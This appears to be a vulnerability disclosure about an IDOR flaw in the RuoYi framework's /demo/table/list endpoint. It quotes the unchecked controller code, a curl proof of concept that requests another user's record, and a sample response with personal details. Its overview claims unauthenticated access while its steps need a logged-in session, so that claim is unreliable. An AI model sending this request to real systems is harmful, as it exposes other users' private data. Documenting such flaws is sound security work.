RuoYi System Unauthorized Data Access Vulnerability Report #291
Description
RuoYi System Unauthorized Data Access Vulnerability Report
Overview
A horizontal privilege escalation vulnerability exists in the RuoYi framework's demo functionality. The /demo/table/list API endpoint allows unauthenticated access to sensitive user data without proper authorization checks, enabling attackers to retrieve private information of any system user.
Vulnerability Details
Type: Horizontal Privilege Escalation (IDOR)
CWE-ID: CWE-639: Authorization Bypass Through User-Controlled Key
Affected Component:
com.ruoyi.web.controller.demo.controller.DemoTableController.list()
Vulnerability Analysis
The vulnerable controller method processes requests without authorization checks:
public TableDataInfo list(UserTableModel userModel) {
// No permission verification
if (StringUtils.isNotEmpty(userModel.getUserName())) {
// Directly filters all users by requested username
for (UserTableModel user : users) {
if (user.getUserName().equals(userModel.getUserName())) {
userList.add(user); // Adds matching user without ownership check
}
}
}
// Returns sensitive user data
}PoC
Reproduction Steps
- Obtain valid session cookie through normal login
- Send malicious request with modified username parameter:
curl 'http://victim-system/demo/table/list' \
-X POST \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: JSESSIONID=attacker_session' \
--data-raw 'userModel.userName=target_user'Expected Result
{
"total": 1,
"rows": [{
"userId": 5,
"userCode": "1000005",
"userName": "target_user",
"userPhone": "139****1234",
"userEmail": "[email protected]",
"userBalance": 9500.00,
"status": "0",
"createTime": "2025-06-01 08:30:15"
}]
}